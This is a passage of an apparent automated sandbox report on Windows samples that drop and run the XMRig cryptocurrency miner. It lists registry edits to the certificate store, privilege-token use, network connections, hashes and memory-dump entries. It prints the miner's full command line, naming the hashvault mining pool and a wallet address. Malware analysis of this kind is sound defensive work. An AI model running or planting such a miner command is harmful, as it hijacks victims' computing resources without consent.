57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3772,i,1305347165619645738,15927664461101562802,262144 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4968,i,1305347165619645738,15927664461101562802,262144 --variations-seed-version --mojo-platform-channel-handle=3844 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4128-14-0x000002B110CB0000-0x000002B110CD0000-memory.dmp

memory/4128-15-0x000002B110D00000-0x000002B110D20000-memory.dmp

memory/4128-16-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-17-0x000002B110D20000-0x000002B110D40000-memory.dmp

memory/4128-18-0x000002B110D40000-0x000002B110D60000-memory.dmp

memory/4128-19-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-20-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-21-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-23-0x000002B110D40000-0x000002B110D60000-memory.dmp

memory/4128-22-0x000002B110D20000-0x000002B110D40000-memory.dmp

memory/4128-24-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-25-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-26-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-27-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-28-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-29-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-30-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-31-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-32-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-33-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-34-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-35-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-36-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-37-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-38-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-39-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-40-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-41-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-42-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-43-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-44-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-45-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-46-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-47-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-48-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-49-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-50-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-51-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-52-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-53-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-54-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-55-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-56-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-57-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-58-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-59-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-60-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-61-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-62-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-63-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-64-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-65-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-66-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-67-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-68-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-69-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-70-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-71-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-72-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-73-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-74-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-75-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-76-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-77-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-78-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-79-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-80-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-81-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

memory/4128-82-0x00007FF7224C0000-0x00007FF722FC3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:44

Platform

win10v2004-20240611-en

Max time kernel

1794s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1860-14-0x00000245B5670000-0x00000245B5690000-memory.dmp

memory/1860-15-0x00000245B6F70000-0x00000245B6F90000-memory.dmp

memory/1860-16-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-19-0x00000245B6F90000-0x00000245B6FB0000-memory.dmp

memory/1860-18-0x00000245B6FB0000-0x00000245B6FD0000-memory.dmp

memory/1860-17-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-20-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-21-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-22-0x00000245B6FB0000-0x00000245B6FD0000-memory.dmp

memory/1860-23-0x00000245B6F90000-0x00000245B6FB0000-memory.dmp

memory/1860-24-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-25-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-26-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-27-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-28-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-29-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-30-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-31-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-32-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-33-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-34-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-35-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-36-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-37-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-38-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-39-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-40-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-41-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-42-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-43-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-44-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-45-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-46-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-47-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-48-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-49-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-50-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-51-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-52-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-53-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-54-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-55-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-56-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-57-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-58-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-59-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-60-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-61-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-62-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-63-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-64-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-65-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-66-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-67-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-68-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-69-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-70-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-71-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-72-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-73-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-74-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-75-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-76-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-77-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-78-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-79-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-80-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-81-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

memory/1860-82-0x00007FF60FC80000-0x00007FF610783000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:44

Platform

win10v2004-20240508-en

